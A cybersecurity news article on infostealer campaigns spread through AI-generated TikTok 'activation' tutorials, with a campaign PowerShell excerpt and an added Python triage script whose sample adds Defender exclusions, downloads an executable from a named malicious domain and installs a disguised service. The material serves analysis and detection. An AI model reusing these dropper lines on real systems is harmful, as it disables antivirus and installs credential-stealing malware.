Cybercriminals are using AI-generated tutorial videos on TikTok to spread information-stealing malware, and the videos have already been viewed hundreds of thousands of times across the platform.
The attackers exploit TikTok's enormous reach by producing convincing AI-generated videos that pose as legitimate software tutorials, targeting users looking for ways to activate pirated applications.
The videos walk viewers through what looks like a routine software activation procedure but actually have them paste and run PowerShell commands that silently install infostealers such as Vidar and StealC on their machines.
The reach is the alarming part: security researchers report that some of these videos have nearly half a million views, so the pool of potentially compromised machines across TikTok's global user base is large.
The technique is a notable step in social engineering, pairing the persuasiveness of AI-generated content with the trust users extend to popular social media platforms.
Unlike conventional distribution through email attachments or dubious downloads, this operation relies on the victim to run the commands themselves because a video tutorial told them to, which makes the threat hard for an average user to recognise.
Censys analysts found that the campaign's infrastructure spans multiple domains and IP addresses chosen to evade detection and keep the operation alive.
Censys researchers traced a wider web of supporting infrastructure, including the domains amssh.co, allaivo.me and winbox.ws, all hosted on AS214196, a provider that advertises "fast, secure, and anonymous virtual servers with no KYC requirements."
Hosting of that kind lets the operators work with little oversight and makes takedowns considerably harder.
PowerShell-Based Infection Mechanism
The infection chain relies on PowerShell scripts that combine several evasion and persistence techniques.
When a victim runs the supplied commands, the script starts a multi-stage payload delivery designed to bypass Windows Defender and secure long-term access to the system.
The core infection script uses base64 encoding to hide the malicious URLs and wraps its downloads in retry loops so the payload is fetched reliably.
A representative excerpt from the campaign shows the approach:
```powershell
# Wraps Add-MpPreference so that any failure is swallowed; the excluded path is no longer scanned by Defender
function Add-Exclusion { param([string]$Path) try { Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue } catch {} }
# Base64-obscured download location; the literal decodes to allaivo.me/crypted.exe
$downloadUrl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("YWxsYWl2by5tZS9jcnlwdGVkLmV4ZQ=="))
```
The script first adds Windows Defender path exclusions for the directories it will use, so files dropped there are not scanned, and then retrieves the main payload from the decoded URL.
For persistence the malware creates hidden directories in system folders and registers itself as a service posing as Windows Update, so it keeps running across reboots while keeping a low profile to evade security products.
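As an added example (it is not the article's code and not the campaign's), the Python script below performs the offline triage an analyst would apply to a dropper like the one excerpted above: it pulls out base64 literals, decodes those that yield printable text, and flags the behaviours this section describes. The sample script it runs on is constructed for illustration; only the base64 literal is taken from the excerpt, and the download, retry-loop and service-creation lines are assumed realisations of what the article describes in prose, as are the regular expressions for them.

```python
"""Offline triage of a PowerShell dropper of the kind described in the article.

Added example, not code from the article or from the campaign. It decodes
base64 literals found in a script and flags the behaviours the article
describes: Defender exclusions, obscured download URLs, retry loops and
service-based persistence.
"""
import base64
import re

# Constructed sample script. Only the base64 literal is from the published
# excerpt; the exclusion path, download, retry loop and service name are
# assumptions standing in for the behaviour the article describes in prose.
SAMPLE_SCRIPT = r'''
function Add-Exclusion { param([string]$Path) try { Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue } catch {} }
Add-Exclusion "$env:ProgramData\WinUpdate"
$downloadUrl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("YWxsYWl2by5tZS9jcnlwdGVkLmV4ZQ=="))
for ($i = 0; $i -lt 5; $i++) { try { Invoke-WebRequest "https://$downloadUrl" -OutFile "$env:ProgramData\WinUpdate\svc.exe"; break } catch { Start-Sleep 10 } }
New-Service -Name "WindowsUpdateSvc" -BinaryPathName "$env:ProgramData\WinUpdate\svc.exe"
'''

# Indicator patterns mapped to a plain-language description. The first two
# come straight from the excerpt; the others are assumed forms of the
# download, retry and persistence steps the article describes.
INDICATORS = {
    r"Add-MpPreference\s+-ExclusionPath": "adds a Windows Defender path exclusion",
    r"FromBase64String": "decodes a base64-obscured string (often a URL)",
    r"(Invoke-WebRequest|DownloadFile|DownloadString)": "downloads a remote payload",
    r"for\s*\(.*\)\s*\{\s*try": "retry loop around a risky operation",
    r"(New-Service|sc(\.exe)?\s+create)": "installs a service for persistence",
}

# Runs of base64 alphabet characters long enough to be worth decoding.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_literals(script: str) -> list[str]:
    """Return every base64 candidate that decodes to printable ASCII.

    Ordinary identifiers such as SilentlyContinue are also valid base64,
    so the printable-text check is what separates real literals from noise.
    """
    found = []
    for match in BASE64_RE.finditer(script):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 for b in raw):
            found.append(raw.decode("ascii"))
    return found


def flag_indicators(script: str) -> list[str]:
    """Return the description of every indicator pattern present in the script."""
    return [desc for pattern, desc in INDICATORS.items() if re.search(pattern, script)]


def triage(script: str) -> dict:
    """Combine decoded literals and behavioural indicators into one report."""
    return {
        "decoded": decode_base64_literals(script),
        "indicators": flag_indicators(script),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_SCRIPT)
    for literal in report["decoded"]:
        print("decoded literal:", literal)
    for hit in report["indicators"]:
        print("indicator:", hit)
```

Run against the constructed sample the script recovers the literal from the excerpt as `allaivo.me/crypted.exe` and reports all five behaviours. On a live endpoint the corresponding check for the first indicator is to list current Defender exclusions with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and treat any path under ProgramData, AppData or a user profile as suspect.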
The post Hackers Drop Info-Stealing Malware On TikTok Users Device Using AI-Generated Videos appeared first on Cyber Security News.